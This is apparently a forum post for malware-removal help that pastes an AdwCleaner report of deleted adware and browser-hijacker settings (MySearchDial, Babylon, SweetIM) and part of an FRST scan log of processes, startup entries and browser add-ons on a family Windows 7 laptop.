Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");
Zeile gelöscht : user_pref("browser.startup.homepage", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCt[...]
Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Zeile gelöscht : user_pref("extensions.crossrider.bic", "1416a701b2c7b5027a0abd74f16d3a66");
Zeile gelöscht : user_pref("extensions.irmysearch.aflt", "irmsd0101");
Zeile gelöscht : user_pref("extensions.irmysearch.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");
Zeile gelöscht : user_pref("extensions.irmysearch.cr", "1727878116");
Zeile gelöscht : user_pref("extensions.irmysearch.instlRef", "");
Zeile gelöscht : user_pref("extensions.mysearchdial.AL", 2);
Zeile gelöscht : user_pref("extensions.mysearchdial.aflt", "irmsd0101");
Zeile gelöscht : user_pref("extensions.mysearchdial.appId", "{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8}");
Zeile gelöscht : user_pref("extensions.mysearchdial.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");
Zeile gelöscht : user_pref("extensions.mysearchdial.cr", "1727878116");
Zeile gelöscht : user_pref("extensions.mysearchdial.dfltLng", "");
Zeile gelöscht : user_pref("extensions.mysearchdial.dfltSrch", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.dnsErr", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.excTlbr", false);
Zeile gelöscht : user_pref("extensions.mysearchdial.hmpg", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.hmpgUrl", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutD[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.id", "60EB69562F4EF90E");
Zeile gelöscht : user_pref("extensions.mysearchdial.instlDay", "16082");
Zeile gelöscht : user_pref("extensions.mysearchdial.instlRef", "");
Zeile gelöscht : user_pref("extensions.mysearchdial.newTabUrl", "hxxp://start.mysearchdial.com/?f=2&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1Czu[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.prdct", "mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.prtnrId", "mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.srchPrvdr", "Mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrId", "base");
Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrSrchUrl", "hxxp://start.mysearchdial.com/?f=3&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1C[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.vrsn", "1.8.21.0");
Zeile gelöscht : user_pref("extensions.mysearchdial.vrsni", "1.8.21.0");
Zeile gelöscht : user_pref("extensions.mysearchdial_i.hmpg", true);
Zeile gelöscht : user_pref("extensions.mysearchdial_i.newTab", false);
Zeile gelöscht : user_pref("extensions.mysearchdial_i.smplGrp", "none");
Zeile gelöscht : user_pref("extensions.mysearchdial_i.vrsnTs", "1.8.21.022:4:59");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "WebSearch");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "WebSearch");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.keyword.URL", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN&l=1&q=");
Zeile gelöscht : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", ".*");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "1");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "1");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.enable", "false");
 
-\\ Google Chrome v36.0.1985.125
 
[ Datei : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Search Provider] : hxxp://de.ask.com/web?q={searchTerms}
Gelöscht [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Homepage] : hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Extension] : pflphaooapbgpeakohlggbpidpppgdff
 
[ Datei : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Search Provider] : hxxp://de.ask.com/web?q={searchTerms}
Gelöscht [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
 
[ Datei : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Search Provider] : hxxp://de.ask.com/web?q={searchTerms}
Gelöscht [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Homepage] : hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Extension] : pflphaooapbgpeakohlggbpidpppgdff
 
[ Datei : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Search Provider] : hxxp://search.creativetoolbars.com/results?src=tb&id=smartbar&g=&q={searchTerms}
Gelöscht [Search Provider] : hxxp://www.bigseekpro.com/search/toolbar/hao123/{432AC9A6-96B0-51C9-30FF-0D2441E553C0}?q={searchTerms}
Gelöscht [Search Provider] : hxxp://www2.delta-search.com/?q={searchTerms}&affID=122304&babsrc=SP_ss&mntrId=44744C0F6E75536C
Gelöscht [Search Provider] : hxxp://search.passwordbox.com/?install_time=20130508205530&sub_id=softonic_s_ppi&browser=chrome&search_term={searchTerms}
Gelöscht [Search Provider] : hxxp://visualbee.delta-search.com/?q={searchTerms}&babsrc=SP_ss&mntrId=44744C0F6E75536C&affID=121377&tsp=5004
Gelöscht [Search Provider] : hxxp://websearch.wisesearch.info/?l=1&q={searchTerms}&pid=298&r=2013/10/17&hid=6563864032225124500&lg=EN&cc=VN&unqvl=39
Gelöscht [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Homepage] : hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Extension] : cloikdolicapcipfoncopeialjfhabgf
Gelöscht [Extension] : eooncjejnppfjjklapaamhcdmjbilmde
Gelöscht [Extension] : flcjcajklmlbpmgckpcmnampagbhhmcp
Gelöscht [Extension] : kdidombaedgpfiiedeimiebkmbilgmlc
Gelöscht [Extension] : niapdbllcanepiiimjjndipklodoedlc
Gelöscht [Extension] : nohfdhapjjlndfgjnmdlcabloeembdkj
Gelöscht [Extension] : pflphaooapbgpeakohlggbpidpppgdff
 
[ Datei : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Search Provider] : hxxp://websearch.pu-results.info/?l=1&q={searchTerms}&pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN
Gelöscht [Search Provider] : hxxp://visualbee.delta-search.com/?q={searchTerms}&babsrc=SP_ss&mntrId=44744C0F6E75536C&affID=121377&tsp=5004
Gelöscht [Search Provider] : hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Search Provider] : hxxp://www.pewdiepie.net/search?searchQuery={searchTerms}
Gelöscht [Startup_urls] : hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Homepage] : hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T&cr=1727878116&ir=
Gelöscht [Extension] : flcjcajklmlbpmgckpcmnampagbhhmcp
Gelöscht [Extension] : kdidombaedgpfiiedeimiebkmbilgmlc
Gelöscht [Extension] : niapdbllcanepiiimjjndipklodoedlc
Gelöscht [Extension] : pflphaooapbgpeakohlggbpidpppgdff
 
*************************
 
AdwCleaner[R0].txt - [70423 octets] - [12/08/2014 17:50:54]
AdwCleaner[S0].txt - [66756 octets] - [12/08/2014 17:57:07]
 
########## EOF - \AdwCleaner\AdwCleaner[S0].txt - [66817 octets] ##########
 
And here are the two FRST.txt and Addition.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-08-2014 01
Ran by Papa (administrator) on FAMILIE-LE-NB on 12-08-2014 19:04:03
Running from C:\Users\PhanCo.FAMILIE-LE-NB\Downloads
Platform: Windows 7 Home Premium (X64) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\afwServ.exe
(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(Samsung) C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe
(Copyright 2012 SAMSUNG) C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe
(Samsung) C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkDMS.exe
(Copyright 2012 SAMSUNG) C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Itim Technologies Co., Ltd.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\1.3.39.7\CocCocCrashHandler.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(NCT Corporation) C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe
(Akamai Technologies, Inc.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe
(i-Funbox.com) C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(CyberLink Corp.) C:\Program Files (x86)\Cyberlink\YouCam6\YouCamService6.exe
(Aeria Games & Entertainment) C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(VNPT-CA) C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-04] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-05] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [YouCam Service6] => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [500696 2013-11-26] (CyberLink Corp.)
HKLM-x32\...\Run: [Aeria Ignite] => C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe [1925656 2013-06-07] (Aeria Games & Entertainment)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [AdobeCEPServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CEPServiceManager4\CEPServiceManager.exe [1039248 2013-03-13] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [4085896 2014-08-12] (AVAST Software)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM-x32\...\Run: [VNPT-CA CL Token Manager V1_std] => C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe [139312 2013-10-30] (VNPT-CA)
HKLM\...\RunOnce: [*WerKernelReporting] => C:\Windows\SYSTEM32\WerFault.exe [415232 2009-07-14] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [OfficeSyncProcess] => C:\Program Files\Microsoft Office\Office14\MSOSYNC.EXE [911040 2013-04-22] (Microsoft Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [HP Photosmart 6510 series (NET)] => C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe [2672488 2011-05-25] (Hewlett-Packard Co.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [Tiny download manager] => C:\Users\Papa\AppData\Local\DM\TinyDM.exe [288728 2014-02-16] (http://www.tinydm.com/)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3604048 2013-06-20] (Tonec Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\RunOnce: [Avast-Browser-Cleanup] => C:\Program Files\Alwil Software\Avast5\BrowserCleanup.exe [2623304 2014-08-12] (AVAST Software)
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\RunOnce: [Report] => \AdwCleaner\AdwCleaner[S0].txt [67076 2014-08-12] ()
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: E - E:\setup_vmc_lite.exe /checkApplicationPresence
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: {bc1d265d-fc35-11e3-b3d0-806e6f6e6963} - F:\autorun.exe
HKU\S-1-5-21-4169419405-2626366916-160398126-1000\...\MountPoints2: {f83808f1-fc17-11e3-a4b2-60eb69562f4e} - F:\autorun.exe
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [DAEMON Tools Lite] => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-07-02] (Google Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [msnmsgr] => C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe [4272624 2013-02-05] (Microsoft Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [CocCoc Update] => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\CocCoc\Update\CocCocUpdate.exe [142200 2014-01-20] (Itim Technologies Co., Ltd.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3604048 2013-06-20] (Tonec Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [NhacCuaTui] => C:\Program Files (x86)\NhacCuaTui\1.0.6.27\NhacCuaTui.exe [2033016 2013-11-22] (NCT Corporation)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [Akamai NetSession Interface] => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Run: [iFunBox Price Watch] => C:\Program Files (x86)\iFunbox 2013\iFunBox2013.exe [5474816 2013-09-27] (i-Funbox.com)
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-4169419405-2626366916-160398126-1007\...\MountPoints2: {d37c59bb-7531-11e3-9803-60eb69562f4e} - D:\Autorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (No File)
Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft SharePoint Workspace.lnk
ShortcutTarget: Microsoft SharePoint Workspace.lnk -> C:\Program Files\Microsoft Office\Office14\GROOVE.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers:  SkyDrive1 -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers:  SkyDrive2 -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers:  SkyDrive3 -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: .webnavi -> {71748560-AA80-4469-9C1D-29A66233974C} => C:\Users\Papa\AppData\Roaming\webnavi\nvi64.dll No File
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShA64.dll (AVAST Software)
ShellIconOverlayIdentifiers: egisPSDP -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll (Egis Technology Inc.)
ShellIconOverlayIdentifiers: IDM Shell Extension -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll (Tonec Inc.)
ShellIconOverlayIdentifiers-x32:  SkyDrive1 -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32:  SkyDrive2 -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32:  SkyDrive3 -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: .webnavi -> {71748560-AA80-4469-9C1D-29A66233974C} => C:\Users\Papa\AppData\Roaming\webnavi\nvi.dll No File
ShellIconOverlayIdentifiers-x32: egisPSDP -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x86\psdprotect.dll (Egis Technology Inc.)
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1007\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1006\User: Group Policy restriction detected <======= ATTENTION
GroupPolicyUsers\S-1-5-21-4169419405-2626366916-160398126-1003\User: Group Policy restriction detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.shb.com.vn/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.acer...03z115t77m1j59s
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.co...ng}&rlz=1I7ACAW
SearchScopes: HKLM-x32 - {E627DC4B-8C04-4234-A2D4-1D634EE01C41} URL = http://www.bigseekpr...q={searchTerms}
SearchScopes: HKCU - {1936EF5F-34A0-4463-AFA7-876B5DEBF462} URL = http://search.condui...5253069553&UM=1
SearchScopes: HKCU - {391588CC-C239-46D5-90E3-05638F1D5DF5} URL = http://search.creati...q={searchTerms}
SearchScopes: HKCU - {4A720000-424D-40a9-A87E-3EBD3E7536CA} URL = http://search.passwo...m={searchTerms}
SearchScopes: HKCU - {57238BE3-743E-4BE5-9F23-6AE7B33571A8} URL = http://www.mysearchr...q={searchTerms}
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.co...1I7ACAW_deVN406
SearchScopes: HKCU - {E627DC4B-8C04-4234-A2D4-1D634EE01C41} URL = http://www.bigseekpr...q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll (Internet Download Manager, Tonec Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Blog This in Windows Live -> {2adefb8e-b923-35e6-86e2-2b7841f5d6a4} -> C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
